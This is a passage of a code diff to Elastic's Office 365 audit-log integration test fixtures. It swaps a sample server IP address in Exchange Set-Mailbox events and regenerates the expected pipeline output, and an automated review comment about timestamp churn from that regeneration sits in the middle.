bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"fcd82149-fc1c-4866-e16d-08d7adfc0cff\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -6780,7 +6780,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", 
@@ -6854,7 +6854,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -6866,7 +6866,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "ProhibitSendReceiveQuota", 
@@ -6948,7 +6948,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"e9e580ee-ac04-436f-9214-08d7adfc0d8b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"e9e580ee-ac04-436f-9214-08d7adfc0d8b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -6960,7 +6960,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json index c986caee655..fa9f120c507 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json @@ -2,12 +2,12 @@ "expected": [ { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +37,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -49,8 +49,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177536800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852951400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 
Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -70,12 +70,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -118,7 +118,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
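Review bot: The `event.ingested` values in this expected-file hunk (and the matching ones at L10936–L10937 and L10939–L10940) moved from a 2021-06-17 timestamp to a 2021-12-09 timestamp only because the expected output was regenerated; they are unrelated to the IP fix and will churn again on every regeneration, burying the intended change. If the elastic-package version in use supports it, declaring the field as dynamic in the test's config (`dynamic_fields:` with `event.ingested: ".*"` in the corresponding `-config.yml`) keeps future diffs limited to real pipeline changes; if that mechanism is not available here, it is worth at least noting in the PR description that the timestamp drift is expected regeneration noise.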
@@ -130,8 +130,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177555800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6c3454e1-1a13-411b-bed1-08d7adfc0c09\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.852960600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6c3454e1-1a13-411b-bed1-08d7adfc0c09\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -151,12 +151,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -199,7 +199,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -211,8 +211,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177560700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"b5131b23-3efb-481a-c05b-08d7ac0f2a82\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.852966700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"b5131b23-3efb-481a-c05b-08d7ac0f2a82\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -232,12 +232,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -267,7 +267,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
